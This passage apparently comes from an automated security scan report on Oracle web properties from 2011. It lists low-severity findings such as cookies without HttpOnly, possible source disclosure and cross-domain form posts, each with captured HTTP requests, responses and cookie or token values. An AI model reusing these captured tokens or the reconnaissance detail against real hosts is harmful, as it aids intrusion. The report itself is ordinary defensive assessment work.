User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:39 GMT
Accept-Ranges: bytes
Content-Length: 7352
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge7K6MQK6EVaAUS1EaweP001nsc
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/

<!--
//global js var
var isNav;

// on load, run this
function doLoad() {

MM_reloadPage(true);
isNav = (navigator.appName.indexOf("Netscape") !=-1);

//register event listeners
...[SNIP]...

6.33. https://login.oracle.com/mysso/sso_loginui/t-bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/t-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:44 GMT
Accept-Ranges: bytes
Content-Length: 271
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgfHH6MQK6EVaAUS1EaweP001nvP
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

6.34. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/t-l-corner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-l-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:44 GMT
Accept-Ranges: bytes
Content-Length: 1005
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgfH^6MQK6EVaAUS1EaweP001nvR
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

6.35. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/t-r-corner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/t-r-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:44 GMT
Accept-Ranges: bytes
Content-Length: 1021
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgfH^6MQK6EVaAUS1EaweP001nvS
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:44 GMT; path=/

GIF89a..2...............................................................................................................................................................................................
...[SNIP]...

6.36. https://login.oracle.com/oam/server/sso/auth_cred_submit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /oam/server/sso/auth_cred_submit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /oam/server/sso/auth_cred_submit HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Content-Length: 2579
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904888%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Acart%253A7881107130450135%7C1318853904890%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520your%25252520shopping%25252520cart%252526pidt%25253D1%252526oid%25253Djavascript%2525253Aapex.submit%25252528%25252527CHECKOUT%25252527%25252529%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

v=v1.4&request_id=1464845504205588723&OAM_REQ=VERSION_4%7EKk%252fxScRUpoZ7Ai84IFFZnAZ9XxsM1Ii8iVy4UnLMUA09vIONA1373ptUbdDbWK1I3N9QNYGFUjCSDxp0GzHunzGq%252fvmBT1AU8oHT9wFSl9DhSVwOc2bfDcq7LD59f1pwdrf60S
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:48:14 GMT
X-ORACLE-DMS-ECID: 0000JCHhU_b6MQK6EVaAUS1EaweP001pGi
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:48:14 GMT; path=/
Content-Length: 2584

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

6.37. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866 HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.oracle.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:38 GMT
X-ORACLE-DMS-ECID: 0000JCHgdlx6MQK6EVaAUS1EaweP001nsI
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:38 GMT; path=/
Content-Length: 3313

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...

6.38. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://oraclestore.oracle.com
Path:   /OA_HTML/ibeCZzpHome.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OA_HTML/ibeCZzpHome.jsp HTTP/1.1
Host: oraclestore.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: ibeCsZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp
Content-Type: text/html; charset=UTF-8
Set-Cookie: GSI=tqwrKmd4MpmUex7vEDNHntFYMv; domain=.oracle.com; path=/
Set-Cookie: GSI_pses=ZG36BBD0929B07C4DF99506769D66E5D4B8DBCA062B2F1A6DD61DE9A7BFE077AE9C90FADE45E3BCEAF4B4C29A29F35F171; expires=Fri, 16-Dec-2011 02:34:04 GMT; path=/OA_HTML
Connection: Close
Content-Length: 315
Date: Mon, 17 Oct 2011 02:34:04 GMT
Set-Cookie: BIGipServergsiap_store_http=3540882061.5150.0000; path=/

<HTML><HEAD><TITLE>Redirect to ibeCZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp</TITLE></HEAD><BODY><A HREF="ibeCZzdMinisites.jsp?ref=http://oraclestore.oracle.com/OA_HTM
...[SNIP]...

6.39. http://solutions.oracle.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: solutions.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: http://solutions.oracle.com/home/basic_search
Content-Type: text/plain
Cache-Control: max-age=0
Set-Cookie: portal=9.0.3+en-us+us+AMERICA+AF7668106FBD0F72E040578C52E12D0A+E3D54B72DD68F2D122F42F952D033AFFE493CFF1636857E6691F09CA1EC90AE536E00D2793662A0B450C3E4B7F6AF0B885D5D5EFD8B8A7B25D16B417C0A0D17AAB52691B72E75103EABDC74A756F5232591455FA5717433E; path=/
Connection: Close
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=571750;ecid=72057677493118445,0)
Content-Length: 0
Date: Tue, 11 Oct 2011 16:50:35 GMT
Content-Location: /servlet/RepositoryServlet/portal/!PORTAL.wwpob_smd.redirect
Set-Cookie: BIGipServersolcat_pool=1309512333.25118.0000; path=/


6.40. http://solutions.oracle.com/portal/page/portal/OPN/sol_cat_wrapper  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/page/portal/OPN/sol_cat_wrapper

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portal/page/portal/OPN/sol_cat_wrapper HTTP/1.1
Host: solutions.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: http://solutions.oracle.com/portal/pls/portal/!PORTAL.wwpob_smd.login?_smd_login_url=http%3A%2F%2Fsolutions.oracle.com%2Fportal%2Fpage%2Fportal%2FOPN%2Fsol_cat_wrapper
Content-Type: text/plain
Cache-Control: max-age=0
Set-Cookie: portal=9.0.3+en-us+us+AMERICA+AF767394F9188550E040578C51E11709+2DF571B67DB6DC5DB2E97297460AC28F97AEF667860E848D501A9A168B24713EB669879EB4C7282EF78E8688AB688FC3048CF6C26B56E64A2995D0827C6B9272052FBDFA829B7D90451B0B04B838125E33809B917673EBF4; path=/
Set-Cookie: BIGipServersolcat_pool=1309512333.25118.0000; path=/
Connection: Close
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=571660;ecid=72057686083055858,0)
Content-Length: 0
Date: Mon, 17 Oct 2011 02:34:53 GMT
Content-Location: /servlet/page/OPN/sol_cat_wrapper
Set-Cookie: BIGipServersolcat_pool=1309512333.25118.0000; path=/


6.41. http://solutions.oracle.com/portal/page/portal/OPN/sol_cat_wrapper/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/page/portal/OPN/sol_cat_wrapper/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portal/page/portal/OPN/sol_cat_wrapper/ HTTP/1.1
Host: solutions.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: http://solutions.oracle.com/portal/pls/portal/!PORTAL.wwpob_smd.login?_smd_login_url=http%3A%2F%2Fsolutions.oracle.com%2Fportal%2Fpage%2Fportal%2FOPN%2Fsol_cat_wrapper
Content-Type: text/plain
Cache-Control: max-age=0
Set-Cookie: portal=9.0.3+en-us+us+AMERICA+AF7668106FBE0F72E040578C52E12D0A+E8D3E47FF748F7451020EFF2147788D3032C3CE96B46C7FDD5F4DF8AF2834472B4B66E1D8F4E69611584A5314CFC92179A6A76C4B2478CF6121F226A931AED614250D91DD86C9D2F4DB1ECE535734E8BB454B469DF47FBC2; path=/
Set-Cookie: BIGipServersolcat_pool=1309512333.25118.0000; path=/
Connection: Close
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=466767;ecid=72057690378020785,0)
Content-Length: 0
Date: Mon, 17 Oct 2011 02:34:50 GMT
Content-Location: /servlet/page/OPN/sol_cat_wrapper/
Set-Cookie: BIGipServersolcat_pool=1309512333.25118.0000; path=/


6.42. http://solutions.oracle.com/portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/ HTTP/1.1
Host: solutions.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Set-Cookie: portal=9.0.3+en-us+us+AMERICA+AF7668106FCC0F72E040578C52E12D0A+7943B303FA163202D6673E5F24FBB61634327EA4FEB2B4A1F07824F917876092D1847591CCF15B3BE6F7A2540EB84A7C2D6F5624EEEB23095C69E6C3D61A4BC19D4B600E16C9225DB13EA0533C1B1A11D3BAA48DF4E137C4; path=/
Connection: Close
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=449255;ecid=134994811307,0)
Content-Length: 160962
Date: Mon, 17 Oct 2011 02:35:02 GMT
Content-Location: /servlet/page/auto_searches/partners/specializations/applications/oracle_policy_automation/
Set-Cookie: BIGipServersolcat_pool=1292735117.25118.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- <!DOCtype html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -->
<H
...[SNIP]...

6.43. http://solutions.oracle.com/specializedpartners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://solutions.oracle.com
Path:   /specializedpartners/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /specializedpartners/ HTTP/1.1
Host: solutions.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Etag: "us, us"
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 16 Oct 2011 17:09:02 GMT
Cache-Control: max-age=0
Set-Cookie: portal=9.0.3+en-us+us+AMERICA+AF76739406FE58A3E040578C51E11AE1+C6405FE855A5760E772F3DFEFED889B7D6B7CD665F8BD8F797CEE2750AC703C0C2AA39586DB16688E0F8186FB8876A00F9DDB232E9A4CF16D3511E6FA4D71A4A46F633E2A917F9E06B97CFD6CE52A64C4AAD864882FA3C65; path=/
Connection: Close
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.0 (TH;max-age=2592000+0;age=466851;ecid=72057711852870427,0)
Content-Length: 125995
Date: Sun, 16 Oct 2011 17:09:02 GMT
Content-Location: /servlet/page/specializedpartners/
Set-Cookie: BIGipServersolcat_pool=1309512333.25118.0000; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- <!DOCtype html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> -->
<H
...[SNIP]...

7. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://campus.oracle.com
Path:   /campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/TodoApp.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:35:28 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:07 GMT
Accept-Ranges: bytes
Content-Length: 456625
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html><head><script>var $wnd = parent;var $doc = $wnd.document;var $moduleName, $moduleBase;</script></head><body><script><!--
var _,pbc='com.google.gwt.core.client.',qbc='com.google.gwt.http.client.'
...[SNIP]...
);}
function wL(){}
_=wL.prototype=new hM();_.me=AL;_.De=BL;_.tN=Bbc+'NamedNodeMapImpl';_.tI=61;function rM(b,a){DL(b,a);return b;}
function tM(a){return jN(a.a);}
function uM(){var a;a=spb(new qpb(),'<?');vpb(a,bM(this));vpb(a,' ');vpb(a,tM(this));vpb(a,'?>');return zpb(a);}
function qM(){}
_=qM.prototype=new CL();_.tS=uM;_.tN=Bbc+'ProcessingInstructionImpl';_.tI=62;function fN(){fN=qxb;xN=BM(new AM());}
function eN(a){fN();return a;}
function gN(e,c){va
...[SNIP]...

8. Cross-domain POST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/apac-subscribe.html

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /campus/HR/apac-subscribe.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://campus.oracle.com/campus/HR/apac-subscribe.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:25:31 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:27:59 GMT
Accept-Ranges: bytes
Content-Length: 1637
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="Layer1" class="style2">
<form style="text-align:center;" action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=CampusoraclecomNews', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true"><input type="text" style="width:100px; font-size:10px; color:#999999;" name="email" id="email" value="Enter Email Address" onfocus="setblank()" onblur="setvalue()"/>
...[SNIP]...

9. Cookie scoped to parent domain  previous  next
There are 3 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation
